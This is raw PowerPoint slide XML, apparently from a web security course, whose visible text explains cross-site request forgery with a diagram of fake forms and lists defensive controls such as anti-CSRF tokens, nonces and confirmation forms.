              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Changes privileges to admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40B076E5-EA0F-4AA1-B9C1-F850AA7FA2FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4848225" y="3028950"/>
            <a:ext cx="2563813" cy="217488"/>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36869" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF2470E-627C-4908-B262-49FFB42E9ECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4870450" y="3810000"/>
            <a:ext cx="2563813" cy="15240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36870" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A884305A-8C18-4F7B-8F35-0BB8AE0986D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-295627">
            <a:off x="5194300" y="2813050"/>
            <a:ext cx="19161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a:t>Web access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>w. Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36871" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060F32CF-9607-4DCA-8DE1-4DA556FB7ED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="161143">
            <a:off x="5037138" y="3557588"/>
            <a:ext cx="16605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Web Form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>with credential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36873" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DABB25-B35A-4A41-84A0-02A922834EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4865688" y="4624388"/>
            <a:ext cx="2568575" cy="314325"/>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36874" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483EEF61-790B-4522-8A73-3CCC7843988D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21099527">
            <a:off x="4987925" y="4387850"/>
            <a:ext cx="29670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Other fake form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>With data copied credential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36878" name="Line 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93314B13-5891-47E6-AC46-51EC86637BF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4865688" y="2505075"/>
            <a:ext cx="0" cy="37338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pic>
        <p:nvPicPr>
          <p:cNvPr id="36880" name="Picture 19" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ECC0708-F3BD-4EAC-9675-7AAE0E55B1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6096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81" name="Picture 20" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53D514B4-3EB4-4F73-B5D7-935A2B37F2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6096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82" name="Picture 21" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD93972D-6D76-4A8B-9FCE-DF75680003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6096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84" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{399AE16A-6B6C-4128-97D3-43D384A4700F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8153400" y="3778250"/>
            <a:ext cx="8397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a:t>listens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36885" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4FD9C47-0777-4036-ADB6-FADF623D70E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21235054">
            <a:off x="5084763" y="5310188"/>
            <a:ext cx="29670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Fake form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>With data copied credential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36886" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F77CEC-6AB2-43F6-A1CF-D9F40198102D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4860925" y="5362575"/>
            <a:ext cx="3592513" cy="45720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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EAF1910-9627-4F09-989F-3791CA92D810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1739842"/>
            <a:ext cx="1008113" cy="922667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06322FD-2098-45F8-A180-EBD6150A648A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8009873" y="1739842"/>
            <a:ext cx="1088105" cy="4094139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D98D40-40D3-4EAB-92A9-FF063C788C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6833808" y="1727123"/>
            <a:ext cx="1076485" cy="4448152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26711671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83208FBB-065E-47B7-9532-A804D5A1BBD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494506" y="601858"/>
            <a:ext cx="8154988" cy="498475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack: Forgery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Cross-Site-Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2321F9-344D-4D34-B7F1-011C0AEFF4B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126999" y="1957388"/>
            <a:ext cx="4295843" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Goal: Complete mediation: every request to server is verified for authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use anti-CSRF package: OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>CSRFGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> or ESAPI Session Management control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nonces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> to prevent replay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use pseudorandom identifiers within cookie for each request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>For dangerous requests, send a separate confirmation form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Detect issues using OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>CSRFTester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40B076E5-EA0F-4AA1-B9C1-F850AA7FA2FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4848225" y="3028950"/>
            <a:ext cx="2563813" cy="217488"/>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36869" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF2470E-627C-4908-B262-49FFB42E9ECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4870450" y="3810000"/>
            <a:ext cx="2563813" cy="15240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36870" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A884305A-8C18-4F7B-8F35-0BB8AE0986D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-295627">
            <a:off x="5194300" y="2813050"/>
            <a:ext cx="19161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a:t>Web access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>w. Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36871" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060F32CF-9607-4DCA-8DE1-4DA556FB7ED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="161143">
            <a:off x="5037138" y="3557588"/>
            <a:ext cx="16605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Web Form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>with credential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36873" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DABB25-B35A-4A41-84A0-02A922834EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4865688" y="4624388"/>
            <a:ext cx="2568575" cy="314325"/>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36874" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483EEF61-790B-4522-8A73-3CCC7843988D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21099527">
            <a:off x="4987925" y="4387850"/>
            <a:ext cx="29670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Other fake form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>With data copied credential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36878" name="Line 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93314B13-5891-47E6-AC46-51EC86637BF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4865688" y="2505075"/>
            <a:ext cx="0" cy="37338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pic>
        <p:nvPicPr>
          <p:cNvPr id="36880" name="Picture 19" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ECC0708-F3BD-4EAC-9675-7AAE0E55B1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6096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81" name="Picture 20" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53D514B4-3EB4-4F73-B5D7-935A2B37F2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6096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82" name="Picture 21" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD93972D-6D76-4A8B-9FCE-DF75680003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6096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84" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{399AE16A-6B6C-4128-97D3-43D384A4700F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8153400" y="3778250"/>
            <a:ext cx="8397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a:t>listens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36885" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4FD9C47-0777-4036-ADB6-FADF623D70E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21235054">
            <a:off x="5084763" y="5310188"/>
            <a:ext cx="29670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Fake form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>With data copied credential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36886" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F77CEC-6AB2-43F6-A1CF-D9F40198102D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4860925" y="5362575"/>
            <a:ext cx="3592513" cy="45720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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EAF1910-9627-4F09-989F-3791CA92D810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4590230" y="1801548"/>
            <a:ext cx="1008113" cy="922667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06322FD-2098-45F8-A180-EBD6150A648A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8009873" y="1739842"/>
            <a:ext cx="1088105" cy="4094139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D98D40-40D3-4EAB-92A9-FF063C788C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6833808" y="1727123"/>
            <a:ext cx="1076485" cy="4448152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
